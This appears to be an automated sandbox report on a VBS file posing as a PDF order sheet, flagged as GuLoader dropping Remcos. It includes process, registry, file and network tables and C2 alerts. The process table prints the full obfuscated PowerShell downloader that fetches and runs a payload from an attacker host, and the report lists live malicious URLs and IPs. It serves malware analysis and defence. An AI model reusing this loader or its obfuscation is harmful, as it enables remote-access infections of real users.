File name: | doc_order_sheet_sn8577THC_13122023_pdf_0000000.vbs |
Full analysis: | https://app.any.run/tasks/4bf92da3-43ee-453b-8213-c6a34794d72c |
Verdict: | Malicious activity |
Threats: | GuLoader is an advanced downloader written in shellcode. It’s used by criminals to distribute other malware, notably trojans, on a large scale. It’s infamous for using anti-detection and anti-analysis capabilities. |
Analysis date: | December 14, 2023, 01:15:54 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF line terminators |
MD5: | 846BE25FE6DD9E8A8CEB9B07CE450E1D |
SHA1: | 9E1D81D4FE3638C6F78C6CF9C045B19E4359EFB8 |
SHA256: | 2CEAB92F90FF80D411D1749601290D25E0F22EE2EE47FE7D3933C6377AB9EDD5 |
SSDEEP: | 1536:D5DRWIZA4ReqoJXN4v8K24hKGLx6Y0230zuEsU:D5Lm4ReqiXGv8KPLx6Y02EzuEsU |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2464 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\doc_order_sheet_sn8577THC_13122023_pdf_0000000.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
1328 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "Function Sopraner ([String]$Anchora){$Hitc = 5;For($Louted=4; $Louted -lt $Anchora.Length-1; $Louted+=$Hitc){ $Samordnin444 = $Anchora.Substring($Louted, $Overellipt46); $Samordnin44=$Samordnin44+$Samordnin444; }$Samordnin44;}$Overellipt46 = (cmd /c 'echo 1 && exit');$Samordnin4401=Sopraner 'Matii GaaeGourxPsyl ';$Samordnin4402=Sopraner 'TerrT StarOpbraKrydnStans KnsfHindeDngerIsogrUdreismagnglutg Tra ';$Prve = Sopraner 'Vign\ NonsDemoyCoagsStrrw SnuoGrftwByer6Unsh4Scan\KravWWaggiFixun StadScoroButiwVidesmisaP HemoForbw EmbeElvarUnsaS SphhGelaeTakklTrollPopp\ UnbvGenf1 Ane.Perj0 Inf\RecipTjuroStevwPolyeQuadr DepsbolshBaggeTeksl OldlCros.jomoeSelexBordeMind ';function antein ($Filmgenre){& ($Samordnin4401) ($Filmgenre);}$Sammens=Sopraner 'RegnhopsttHardtSrilpOver: Bef/Bess/ SkiyMeastPantgtimiz Bab5 Dil.NonfsStilaKaur.IndacLeveoKonsmCloy/drupM Udle FrstOpsph Dopo virlGatecSummaSpectAutoeFatt.FermiMelon DemfTilr ';antein (Sopraner 'Bund$NonfgCoprlSaloo EmbbBogsaAlsblJoin:BegyWBomboOiliuSitdsLtbt2Alex=Appl$There MycnPrinvEqui:TachwobjeiRettnPeridTieriNoncrSptt ') ;antein (Sopraner 'Jizy$FaxegIntelZebooUflybBouraSpeclBund:ParmWBladoValluTopis bil6Styr=Brnd$moduWRebeoWolfuSifbsLito2Klar+ Ned$DeduPpoocrBudgvsnooeMeth ') ;antein (Sopraner ' Hiw$ChrogSelvlBecaoUdstb ForaKalkl Imp:cannWSynkoNoveuSvngsAbra3Awak Unde= mer Unr(Pina( BiggsonawExhimExfli Nei flerwUnreiLitunYder3Fugi2Stud_ OprppictrSideotitocribseSenissubfsScle Ilbu-NullFVare waarPSamtr RaaoTumpcSilieUndes GtesTilsIvarvdSkrs=Emra$Dkni{OsteP UpwIStoeD sag} Wid)Abso.KabeCNyttoNstvmKlasmanimaRolln AtodKameLunaniOvernStiteRang) Fem Lymp-SuprschaupNomilDaisiletmt Uni gst[OretcallehPoulaSabbrSpac]fyld3Rade4Nedj ');antein (Sopraner 'Siby$restgHjlplAntao BembPropaCycllNont:TdleWerhvoJibiu Skos Til4Micr Myth= Bor Intr$DispW PhyoPeriuPrems Bru3Affe[Soci$QueeW Acho SigunonssKate3Dres.UnjucSpliodatcuBortnAfprtLate-Hjul2Tall]Seri ');antein (Sopraner ' Kli$ Befg GenlGloroHiplbMedeaVacclLysi:SprjW RunoGennu mulsTynd5 Pon=Shiv(KvatTNukleKaadsSkjot unr-TronPUdleaTrantSputhBorg Disp$ SinWFeatoStiluVedisLavs6Unge) Spa klkn-OvulAMaginAnskdSpol Futc(Homa[PrecISkilnBroltForuPCleatdyrerAabn]Ster:Impl:NittsScheiRustzTelteGroe Loed-OmdbeDopiq Ser Suga8Bard)Phot ') ;if ($Wous5) {& $Wous6 $Wous4;} else {;$Samordnin4400=Sopraner 'Tari$ForhgRemolBondoGlanbIrreaErhvlEart:cocaWSurpo monuHovesSlik8Prjs Cede=stvn MistSStuvtUdstaSvejrAmphtLeve-FogeB KjeiGaustMaalsconsTDismrDousa CasnRegisNihifGalletrver Und Ree- regS anaoGerruAddirRelacBarseBost skib$OverSrivea Ovem SpimDeaee TolnArbesBesl Pers-LithDLinneSlutsChimtEleni GymnKultaUnprtMistiOpaloSermnAnas Revn$beveWTyreoReceuSubgsRele2Deco ';antein (Sopraner 'Maxi$baalgFravlSmokoTrylbPrina UddlSpri:ParaWCripoReviuOffssKami2 Kon=Init$SlaveZelanStarvGlas:FrstaTestp Ligp RoldEtataYeamtAndeaElec ') ;antein (Sopraner 'YderIExemmEneupSpiloFiskrChlotAfsp-KataMTampoIncodAgtsuCitrlAcetesell VidkB PeniRytttBloosbuffTRestrKonnaFredn GrusdrypfBeste ChrrCycl ') ;$Wous2=$Wous2+'\Dehydr151.Hyp' ;antein (Sopraner 'Cola$Vindg Cojl SoloStarbAphtaBedvlAsso:SkulWUnbeoBobbuaigus Aut7 Syn=afkr(PaniTMinie CivsEnantResp-EmboPSlida dyrtCerahcent Tord$SortWWhoro Whiu Apos Ron2Elev)Milc ') ;while (-not $Wous7) {antein (Sopraner 'DumpIIndlfSnec Cres(Deco$FindWEksaoSappuKontsNymp8Male.LegaJLillo Banb CenSInset GauaCanetNorme Sdc post-Macre ChiqEner Dygt$FngsS Husa SpamGennoTjurrpseud UnpnUdbuiCatenMort4Tryk4Rend0Nske2Bran)Afri Past{MagtSRetnt Otta MairLasttsnus-InfoS DellBlooeVarmesystpMezz Nigg1Iref} Flae Synl TitsChaee Uns{PrerSLokkt Prea SedrAspetExtr-PahaSStorlMammeAfgueNondpKrom Joha1stra; UnkaKagenGeodtBeskeMistiRansn Ort Acti$MatsSAkkoaHvormLystoTrflr risdNusenBriciOptinSalu4Anfi4 Byg0Hjer0Amyl}Mara ');antein (Sopraner 'bara$ DetgJamal Polo NonbfortaBagplGran:GodsWBenzo YeauAspislesg7Svrt= acc(LympTYelleSmedsurostUnfu-BleaPTilbaKopitMeloh San Mode$ SphWPopuoDissuSpers Bid2Paat)misa ') ;}antein (Sopraner 'Abon$Purpg GrnlKrimoTranbSpecaSukklProg:UrhaAFlamrEluvcHalfhAnkeiNoilmZarioHand prog=Irsk YdelGZooteNordtNonm-SereC NopoBarfn CedtHemie DacnMonat Ass Tra$RoseWReseo IseuSluts Fla2Pant ');antein (Sopraner 'spha$Horig LivlTradoImpobAflaaAfsklKoll:AnapAVrdisKamesUnpeaPred Unp=Godk Rema[TestSUnfryMugssUnabtPyeleSiccm Liq.PaagCSsteoFdemnPottvVenseTrenr Degt Sen]Rake:Frak:UdfrFMudsrFraaoDazymInstBAnonaLandsSoleeUnin6Silv4HabiSCatatValurIntriBulnn BrigDefl( Omf$GkkeADotirOmkac nonhDiplismaamTeleo Hal)Coca ');antein (Sopraner 'rank$PtergskollMisfo ClebPrioaSunblFred:LuneSUnstaShiemForeoUntirHobbdAulenDessiChornCalo4Fami4 Wit2Skom Rewh=Hjem Sign[OrpiSHaany Kaps HomtBybaeunfom gru. ForTUroleForhx AmbtLeas.HaitE CounUnilc IndoSkidd Booi Misn PlegRent] Fng:Trop:AnskARinkS FaiCIconIalbuI Gra.VlesGTekneStdet MolSCumotKrlirUrani OvenAmmegMisb(cont$BeskABesvsfljlsSucca Rel)Raad ');antein (Sopraner ' Faa$UordggrunlTromoSynabEkspaUntrlSyke: ColSDdsaaMicrmAmisoStoerMadedJollnPlasialtonShic4Strm4 Uns3Reso= can$KistSRegnaProtmModtoAfrorSobedmobbnMilii Born Int4Gigu4Hjer2Subc. SelsJaneuRussbMeins Auxt DysrPsykiChymnPragg Wee(Afte2Nont7Rich3inde0Geom7Drmm1Samb,Medt1Nonp9Dyna0melo1Bifa0Drmt)Kdef ');antein $Samordnin443;};;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wscript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3856 | "C:\Windows\system32\cmd.exe" /c "echo 1 && exit" | C:\Windows\System32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3144 | "C:\Program Files\Windows Media Player\wmpnscfg.exe" | C:\Program Files\Windows Media Player\wmpnscfg.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Media Player Network Sharing Service Configuration Application Exit code: 0 Version: 12.0.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3208 | "C:\Program Files\windows mail\wab.exe" | C:\Program Files\windows mail\wab.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3168 | "C:\Program Files\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\puojmtdbapimi" | C:\Program Files\windows mail\wab.exe | wab.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2536 | "C:\Program Files\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\zptcnlndoxaqtnks" | C:\Program Files\windows mail\wab.exe | wab.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
3684 | "C:\Program Files\windows mail\wab.exe" /stext "C:\Users\admin\AppData\Local\Temp\jrgmfdyxcfsvvtgeuvm" | C:\Program Files\windows mail\wab.exe | wab.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Contacts Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
|
(PID) Process: | (2464) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (2464) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (2464) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
(PID) Process: | (2464) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | AutoDetect |
Value: 0 | |||
(PID) Process: | (1328) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\17F\52C64B7E |
Operation: | write | Name: | LanguageList |
Value: en-US | |||
(PID) Process: | (3208) wab.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings |
Operation: | write | Name: | ProxyEnable |
Value: 0 | |||
(PID) Process: | (3208) wab.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections |
Operation: | write | Name: | SavedLegacySettings |
Value: 460000005A010000090000000000000000000000000000000400000000000000C0E333BBEAB1D3010000000000000000000000000100000002000000C0A8016B000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | |||
(PID) Process: | (3208) wab.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
(PID) Process: | (3208) wab.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | IntranetName |
Value: 1 | |||
(PID) Process: | (3208) wab.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 1 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3168 | wab.exe | C:\Users\admin\AppData\Local\Temp\bhv7790.tmp | — | |
MD5:— | SHA256:— | |||
1328 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T93JGNMZS8Q8D0S4FNPD.temp | binary | |
MD5:16F6D260068B85896C0EBB2E1B2A60D1 | SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984 | |||
2536 | wab.exe | C:\Users\admin\AppData\Local\Temp\zptcnlndoxaqtnks | text | |
MD5:7FB9A9AD0FD9B1E0108ED71FBB276048 | SHA256:7D63C301317E144B0133A72250AE2D8E09AF65A92E6A807EC58A71939FE530A9 | |||
1328 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16F6D260068B85896C0EBB2E1B2A60D1 | SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984 | |||
1328 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2102ce.TMP | binary | |
MD5:16F6D260068B85896C0EBB2E1B2A60D1 | SHA256:6E3B1EF1FB4736A9BF18FADF8E42935CC5053478B6F403A38EFBA8500E819984 | |||
3168 | wab.exe | C:\Users\admin\AppData\Local\Temp\puojmtdbapimi | text | |
MD5:0888EB5C6DCC37DDA28287D909D6DB1C | SHA256:D3C10379D5FD57E579AD3FC6A5B12C5CF19827DDC4F78367B16ADE825F8C3F37 | |||
3208 | wab.exe | C:\Users\admin\AppData\Roaming\vorspt.dat | binary | |
MD5:B19C5FD63522F429D96B8CEA9EBF4E51 | SHA256:A25C825AAF8A4EB811A3DC1F94FD72622A0A79F00A3D35B09579FA6042C3CF1B | |||
3208 | wab.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\json[1].json | binary | |
MD5:08988CC5BBD44E9F464C3B165990369F | SHA256:FA3511B557F720F20B11281290FF1A01CB177A9A170067D17D5037F49B7EB125 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3208 | wab.exe | GET | 200 | 103.83.194.50:80 | http://ytgz5.sa.com/gBuCeYv217.bin | unknown | binary | 483 Kb | unknown |
868 | svchost.exe | HEAD | 200 | 103.83.194.50:80 | http://ytgz5.sa.com/Metholcate.inf | unknown | — | — | unknown |
3208 | wab.exe | GET | 200 | 178.237.33.50:80 | http://geoplugin.net/json.gp | unknown | binary | 948 b | unknown |
868 | svchost.exe | GET | 200 | 103.83.194.50:80 | http://ytgz5.sa.com/Metholcate.inf | unknown | text | 380 Kb | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
2588 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
1080 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
868 | svchost.exe | 103.83.194.50:80 | ytgz5.sa.com | HOST4GEEKS-LLC | AU | unknown |
3208 | wab.exe | 103.83.194.50:80 | ytgz5.sa.com | HOST4GEEKS-LLC | AU | unknown |
3208 | wab.exe | 85.209.176.69:57484 | — | Zenex 5ive Limited | FR | unknown |
3208 | wab.exe | 178.237.33.50:80 | geoplugin.net | Schuberg Philis B.V. | NL | malicious |
Domain | IP | Reputation |
---|---|---|
ytgz5.sa.com |
| unknown |
geoplugin.net |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Server Response |
— | — | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Server Response |
— | — | Malware Command and Control Activity Detected | ET MALWARE Remcos 3.x Unencrypted Server Response |